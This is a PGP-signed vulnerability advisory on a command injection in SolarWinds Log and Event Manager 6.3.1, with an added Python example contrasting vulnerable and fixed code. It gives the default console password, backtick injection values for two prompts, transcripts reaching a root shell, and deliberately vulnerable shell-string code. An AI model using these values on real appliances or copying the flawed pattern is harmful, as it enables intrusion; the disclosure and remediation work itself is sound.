-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection

Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt


1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command
Impact: Privileged Access
Attack vector: SSH


2. Vulnerability Description

Insufficient input validation in the management interface can be leveraged
in order to execute arbitrary commands. This can lead to (root) shell access
to the underlying operating system.


3. Technical Description

An attacker who can log in to the SSH management console as the cmc user
(default password "password") can escape the restricted console and obtain
a shell on the underlying operating system. This report details two distinct
attack vectors: the username input during SNMP setup and the destination
e-mail input during debug. In both cases the value typed at the prompt is
interpolated into a shell command without neutralizing shell metacharacters,
so a value wrapped in backticks is executed as a command (CWE-78).

The two vectors differ in the privilege obtained. The SNMP path drops into an
unrestricted shell as the cmc user (note the cmc@swi-lem prompt in the first
transcript). The debug path runs its collection step under sudo, as the
"sudo: unable to resolve host" warnings in the second transcript show, so
the injected /bin/bash runs as root (uid=0 in the id output).

============
=   SNMP   =
============

This is accomplished by placing `/bin/bash` (including the backticks) in the
username input during SNMP server setup.
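Before the appliance transcripts, here is the underlying pattern in code. This
is an added example written for this page; it is not the appliance's code and
not from the advisory or from SolarWinds. The function names are made up, and
printf stands in for the real SNMP configuration tool so the block runs
offline on any system with a POSIX /bin/sh. The vulnerable function keeps the
shell-string bug on purpose; the two fixed variants show the argv-list form
and allowlist validation, and a shlex.quote() fallback for the case where a
shell string cannot be avoided.

```python
"""Constructed illustration of the CWE-78 pattern behind KL-001-2017-007.

Not the appliance's code: the real SNMP configuration tool is replaced by
printf so the example runs offline, and the function names are invented.
"""
import re
import shlex
import subprocess

# Allowlist for an SNMPv3 user name: letters, digits, '_', '.', '-' only.
# Everything the shell could interpret (` $ ( ) ; | & > < and spaces) is
# outside the class and therefore rejected.
SNMP_USER_RE = re.compile(r"[A-Za-z0-9_.\-]{1,32}")


def configure_snmp_user_vulnerable(username: str) -> str:
    """The bug: untrusted text is spliced into a string that /bin/sh parses.

    A value such as `id` is a command substitution to the shell and runs
    before printf ever sees it. On the appliance the same mistake turned the
    SNMP user name prompt into a shell escape.
    """
    cmd = f"printf 'creating SNMPv3 user %s\\n' {username}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def configure_snmp_user_argv(username: str) -> str:
    """Fix 1: no shell at all.

    The value is a single argv element and is never parsed, so backticks
    reach printf as literal characters.
    """
    proc = subprocess.run(
        ["printf", "creating SNMPv3 user %s\n", username],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def configure_snmp_user_hardened(username: str) -> str:
    """Fix 2: allowlist the value and avoid the shell.

    Validation is the layer that still holds if some later code path hands
    the value to a shell anyway.
    """
    if not SNMP_USER_RE.fullmatch(username):
        raise ValueError(f"rejected SNMP user name: {username!r}")
    return configure_snmp_user_argv(username)


def quote_for_shell(username: str) -> str:
    """Fallback when a shell string is unavoidable.

    shlex.quote() wraps the value in single quotes so metacharacters are
    inert; prefer the argv form where possible.
    """
    cmd = f"printf 'creating SNMPv3 user %s\\n' {shlex.quote(username)}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "`echo INJECTED`"   # constructed stand-in for `/bin/bash`
    print("vulnerable:", configure_snmp_user_vulnerable(payload), end="")
    print("argv      :", configure_snmp_user_argv(payload), end="")
    print("quoted    :", quote_for_shell(payload), end="")
    try:
        configure_snmp_user_hardened(payload)
    except ValueError as exc:
        print("hardened  :", exc)
```

Running the block shows the difference directly: the vulnerable variant
prints "creating SNMPv3 user INJECTED" because the shell ran the backticked
command, while the argv and quoted variants print the backticks themselves and
the allowlisted variant refuses the value outright. The same check applied to
the debug vector's `/bin/bash >&2` rejects it on the space and the redirect.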
$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6

//////////////////////////////////////////////////
///   SolarWinds Log & Event Manager           ///
///   management console                       ///
//////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH

Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
  upgrade        Upgrade this Appliance
  admin          Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
  import         Import a file that can be used from the Admin UI
  help           display this help
  exit           Exit

cmc > service

Available commands:
  startssh           Start the SSH Service
  stopssh            Stop the SSH Service
  restartssh         Restart the SSH Service
  restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
  unrestrictssh      Remove Restrictions on Access to the SSH Service
  snmp               Configure the SNMP Services
  copysnortrules     Copy Snort rules to floppy or network share
  loadsnortrules     Load Snort rules from floppy or network share
  loadsnortbackup    Load Snort rules from backup
  restartsnort       Restart the Snort Service
  enableflow *       Enable the flow Collection Service
  disableflow        Disable the flow Collection Service
  restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
  unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
  restrictreports    Restrict Access to Reports by IP/hostname
  unrestrictreports  Remove Restrictions on Access to Reports
  stopopsec          Stop all running OPSEC LEA client connections
  help               display this help
  exit               Return to main menu

NOTE: Commands with an asterisk (*) include an automatic manager service restart

cmc::service > snmp
SNMP Trap Logging Service is RUNNNING
Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is RUNNNING
Would you like to STOP the SNMP Request Service? [Y/n] Y
The SNMP Trap Logging Service is stopped.
The SNMP Request Service is stopped.
cmc::service > snmp
SNMP Trap Logging Service is DISABLED
Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y
SNMP Request Service is DISABLED
Would you like to ENABLE the SNMP Request Service? [Y/n] Y
Enter the port number to access SNMP on LEM (default: 161):
Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
Enter the authentication password (default: orion123):
Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
Enter the encryption key (default: orion123):
cmc@swi-lem:/usr/local/contego$

============
=  Debug   =
============

This is accomplished by placing `/bin/bash >&2` (including the backticks) in
the destination e-mail input during debug. Because a backtick expression is a
command substitution whose standard output is captured by the calling shell,
bash's stdout is redirected to stderr (>&2) so that the interactive prompt
still reaches the terminal. As the id output at the end of the transcript
shows, the resulting shell runs as root.

$ ssh cmc@1.3.3.7
Password:
Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6

//////////////////////////////////////////////////
///   SolarWinds Log & Event Manager           ///
///   management console                       ///
//////////////////////////////////////////////////

Detected VMware Virtual Platform
Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH

Available commands:
  [ appliance ]  Network, System
  [ manager ]    Upgrade, Debug
  [ service ]    Restrictions, SSH, Snort
  [ ndepth ]     nDepth Configuration/Maintenance
  upgrade        Upgrade this Appliance
  admin          Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
  import         Import a file that can be used from the Admin UI
  help           display this help
  exit           Exit

cmc > manager

Available commands:
  actortoolupgrade *    Upgrade your Manager's Actor Tools (CD/floppy)
  archiveconfig         Set your Manager Database Archive Schedule/Settings
  backupconfig          Set your Manager Backup Schedule/Settings
  cleanagentconfig      Reconfigure the agent on this box to a new manager
  configurendepth *     Configure the manager to use an nDepth server.
  confselfsignedcert *  Configure the manager to use a self signed certificate
  dbrestart             Restart database
  debug                 Send Debugging Information to an Alternate Address
  disabletls            Disable TLS for DB connections
  enabletls             Enable TLS for DB connections
  exportcert            Export the CA certificate for console
  exportcertrequest     Export a certificate request for signing by CA
  hotfix                Install LEM hotfix.
  importcert *          Import a certificate used for console communication
  importl4ca *          Import a CA of the other node in L4 configuration
  licenseupgrade *      Upgrade your Manager License (CD/floppy/network)
  logbackupconfig       Set your Manager Log Backup Schedule/Settings
  resetadmin            Reset the "admin" user password to default
  restart *             Restart Manager Service
  sensortoolupgrade     Upgrade your Manager and Agent Sensor Tools (CD/floppy)
  showlog               Show Manager Log File
  showmanagermem        Show the memory setting of SolarWinds manager
  start                 Start Manager Service
  stop *                Stop Manager Service
  support               Send Debugging Information to Tech Support @trigeo.com
  togglehttp *          Enable or disable HTTP (port 80).
  viewsysinfo           Show information about machine and SolarWinds manager
  watchlog              Watch Manager Log File
  exit                  Return to main menu

NOTE: Commands with an asterisk (*) include an automatic manager service restart

cmc::manager > debug
Press to capture debugging information
You will need to provide an SMTP server or Windows File Sharing Credentials
Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
UpdateInfo failed: VMware Guest API is not enabled on the host
.e.sudo: unable to resolve host swi-lem
sudo: unable to resolve host swi-lem
.cat: /etc/hosts: No such file or directory
done.
sudo: unable to resolve host swi-lem
E-Mail/Network share/Quit? (e/n/q) e
E-Mail/Network share/Quit? (e/n/q) e
Please enter the e-mail recipient: (e.g. support@trigeo.com)
> `/bin/bash >&2`
Is the e-mail address <`/bin/bash >&2`> correct? Y
Please enter the name this message should appear from (e.g. Someone Important)
> Test
Is the name Test correct? Y
Please enter the e-mail address this message should appear from (e.g. someone@trigeo.com)
> fake@localhost
Is the e-mail address fake@localhost correct? Y
Please enter the SMTP server you wish to send mail through (e.g. smtp.yournetwork.com)
> 127.0.0.1
Is the SMTP server 127.0.0.1 correct? Y
Please enter the name of your company (e.g. Initech, Post Falls branch or Veridian Dynamics)
> Test
Is the company Test correct? Y
Please enter a phone number where you can be reached (e.g. 509.555.1234)
> Test
Is the number Test correct? Y
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--


4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this vulnerability. Hotfix and
installation instructions are available at:

https://thwack.solarwinds.com/thread/111223

Until the hotfix is applied, both vectors require a cmc console login, so
changing the default cmc password and limiting SSH access to the appliance
(the console's own restrictssh command restricts it by IP address or
hostname) reduces exposure.


5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) and
Hank Leininger of KoreLogic, Inc.


6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds
             using PGP key with fingerprint
             A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in use, requests
             alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate
             Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability report.
2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged
             receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.


7. Proof of Concept

See 3. Technical Description


The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are
licensed under a Creative Commons Attribution Share-Alike 4.0 (United States)
License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track
record of providing security services to entities ranging from Fortune 500 to
small and mid-sized companies. We are a highly skilled team of senior security
consultants doing by-hand security assessments for the most important networks
in the U.S. and around the world. We are also developers of various tools and
resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlj+VoEaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQzp9AgAhAu3fN2lrvCC6IGo30Fm
kTEj5Im1nOGJ5UrAy9fiENXCAiHWDeqh0QifcwcYuR0JvzyjdN7tyShis7NhWn5Q
cu327GhLL87Aaf+3gJ7amNjsCGfBut2tDC3dHpXw3ePcWrUITFYi8odP67PD46Ft
uP8yOJIjHGf0Q2UZBE3c2mliZdPuw5tOATbtHvEGpFGJ6pIauFgeO7ytQSFFGmCo
HtWDEJOW4H5T4aPLY676gkAEPVNeo5kKtFsBtnZIUkodBX/BpXsuH8eyYHYzV3na
iVgDYvfT4hFNgsG/cKq+odklniG6rMAxtDq1S48xCy1Gwqc+fqr5IZDz2djBo3jk
rA==
=NnhW
-----END PGP SIGNATURE-----